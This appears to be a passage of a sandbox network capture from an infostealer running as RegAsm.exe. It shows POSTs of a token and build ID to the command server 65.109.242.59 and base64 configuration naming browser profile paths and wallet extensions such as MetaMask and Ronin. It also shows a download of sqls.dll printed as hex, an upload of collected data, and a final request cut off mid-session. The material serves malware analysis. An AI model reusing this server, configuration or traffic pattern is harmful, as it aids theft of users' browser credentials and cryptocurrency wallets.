                                                                                  2024-05-24 15:47:00 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:00 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                  Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.64971565.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:01 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----FHJDBKJKFIECAAAKFBFB
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:01 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 44 42 4b 4a 4b 46 49 45 43 41 41 41 4b 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 42 4b 4a 4b 46 49 45 43 41 41 41 4b 46 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 44 42 4b 4a 4b 46 49 45 43 41 41 41 4b 46 42 46 42 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------FHJDBKJKFIECAAAKFBFBContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------FHJDBKJKFIECAAAKFBFBContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------FHJDBKJKFIECAAAKFBFBCont
                                                                                  2024-05-24 15:47:02 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:02 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:02 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                  Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.64971665.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:02 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 332
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:02 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------HJJJDAEGIDHCBFHJJJEGCont
                                                                                  2024-05-24 15:47:03 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:03 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:03 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.64971765.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:04 UTC279OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----BAKEBAFIIECBGCAAAAFC
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 7885
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:04 UTC7885OUTData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 41 46 49 49 45 43 42 47 43 41 41 41 41 46 43 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------BAKEBAFIIECBGCAAAAFCContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------BAKEBAFIIECBGCAAAAFCCont
                                                                                  2024-05-24 15:47:05 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.64971865.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:05 UTC194OUTGET /sqls.dll HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:05 UTC248INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:05 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 2459136
                                                                                  Last-Modified: Fri, 24 May 2024 10:18:21 GMT
                                                                                  Connection: close
                                                                                  ETag: "6650696d-258600"
                                                                                  Accept-Ranges: bytes
                                                                                  2024-05-24 15:47:05 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                  2024-05-24 15:47:05 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                  Data Ascii: X~e!*FW|>|L1146
                                                                                  2024-05-24 15:47:05 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                  Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                  2024-05-24 15:47:06 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                  Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                  2024-05-24 15:47:06 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                  Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                  2024-05-24 15:47:06 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                  Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                  2024-05-24 15:47:06 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                  Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                  2024-05-24 15:47:06 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                  Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                  2024-05-24 15:47:06 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                  Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                  2024-05-24 15:47:06 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                  Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.64971965.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:08 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEH
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 829
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:08 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------CBAKFCBFHJDHJKECAKEHCont
                                                                                  2024-05-24 15:47:09 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.64972165.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:09 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA
